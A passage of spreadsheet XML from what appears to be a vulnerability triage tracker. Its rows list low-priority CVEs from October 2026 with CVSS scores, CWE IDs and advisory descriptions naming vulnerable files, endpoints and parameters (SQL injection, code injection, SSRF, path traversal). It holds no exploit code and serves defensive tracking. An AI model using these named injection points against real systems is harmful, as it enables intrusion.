          <t>A vulnerability was detected in crossplane crossplane-runtime up to 2.2.2/2.3.2. This vulnerability affects the function Get of the file pkg/xpkg/client.go of the component ImageConfig. The manipulation results in time-of-check time-of-use. The attack may be launched remotely. Upgrading to version 2.2.3, 2.3.3 and 2.4.0-rc.1 is able to resolve this issue. The patch is identified as bee99c6cd6ca81878acca2940a2f0a02169fc208. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105163</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105205</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.5 contains an information disclosure vulnerability that allows publish-mode readers to learn backlink block IDs and reference counts from password-protected and publish-disabled documents by querying a published document. Attackers can send POST requests to /api/block/getDocInfo or getDocsInfo for a published document ID to obtain refIDs and refCount of hidden referencing blocks, bypassing the publish confidentiality boundary.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105205</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105206</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.0.0 through 3.4.15 and 4.x before 4.17.3 contains an incorrect authorization flaw in the User Service API, which verifies user.read against the caller's organization rather than the organization owning the target user. An authenticated member holding org-scoped user.read can query GET /v2/users/{userId}/authentication_methods to learn which authentication method types users in other organizations have registered.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105206</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105137</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Laradock up to 20.4. Impacted is an unknown function of the file workspace/Dockerfile of the component Build Process. The manipulation results in download of code without integrity check. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105137</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105146</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Comsenz Discuz! X5.0-20260801/X5.0-20260820/X5.0-20260910. Affected by this issue is the function modmedalsubmit of the file upload/source/app/admin/child/medals/mod.php of the component Admin Medal Moderation. The manipulation of the argument delete results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105146</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105176</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Drug Recommendation System 1.0. Impacted is an unknown function of the file /Admin/edit_class.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105176</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105177</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Drug Recommendation System 1.0. The affected element is an unknown function of the file /Admin/add_drug.php of the component Drug Creation. Such manipulation of the argument txtname/cmdtype/txtusage/txtsideeffect/cmdcontraindication leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105177</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105178</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Drug Recommendation System 1.0. The impacted element is the function mysqli_real_escape_string of the file /Admin/add_symptom.php of the component Symptom Creation. Performing a manipulation of the argument txtname results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105178</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105226</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in osCommerce osCommerce2 up to 2.3.4.1. This vulnerability affects the function include of the file admin/newsletters.php of the component Newsletter Management. Performing a manipulation of the argument module results in code injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105226</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-104402</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in farvisun Mindio Magic MCP mindio-magic-mcp allows Retrieve Embedded Sensitive Data.This issue affects Mindio Magic MCP: from n/a through 0.5.6.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-104402</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105157</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in RainyGao DocSys up to 2.02.85. The affected element is the function DocController.doGetTmp of the file /Doc/doGetTmpFile.do of the component Document Controller. The manipulation of the argument path/fileName leads to path traversal. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105157</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105225</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in osCommerce osCommerce2 up to 2.3.4.1. This affects the function include of the file includes/classes/payment.php of the component Payment Page. Such manipulation of the argument MODULE_PAYMENT_INSTALLED leads to code injection. The attack can be executed remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105225</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105301</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the X.509 client-certificate authenticator of Keycloak, a solution for identity and access management. The issue occurs when the server is configured to check certificate revocation using CRL Distribution Points or OCSP. An attacker can provide a specially crafted certificate that points to a malicious server, causing Keycloak to make unauthorized outbound requests to internal or external endpoints before the certificate is fully validated. This can lead to a blind server-side request forgery (SSRF) attack.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105301</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105156</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-326, CWE-916</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in YzmCMS up to 7.6. Impacted is the function Password of the file /common/function/system.func.php of the component MD5 Handler. Executing a manipulation of the argument pass can lead to password hash with insufficient computational effort. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The exploit has been made available to the public and could be used for attacks. The vendor kindly explains: "Our regular release cycle is about 6 months. The last release was in the previous month, and our next scheduled version will be released in March 2027. We will implement the backward-compatible gradual hash migration feature in this upcoming release. (...) Before the new version is available, we will publish security mitigation guidance on our official documentation for existing deployers to reduce the risk."</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105156</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105237</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-307, CWE-799</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in linlinjava litemall up to 1.8.0. This affects an unknown part of the file litemall-admin-api/src/main/java/org/linlinjava/litemall/admin/web/AdminAuthController.java of the component Login Endpoint. The manipulation results in improper restriction of excessive authentication attempts. The attack may be performed from remote. A high complexity level is associated with this attack. It is indicated that the exploitability is difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105237</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105245</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-310, CWE-319</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in sgl-project sglang up to 0.5.21. This issue affects the function server_info of the file python/sglang/srt/entrypoints/http_server.py of the component HTTP Endpoint. Such manipulation of the argument api_key leads to cleartext transmission of sensitive information. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105245</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105173</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
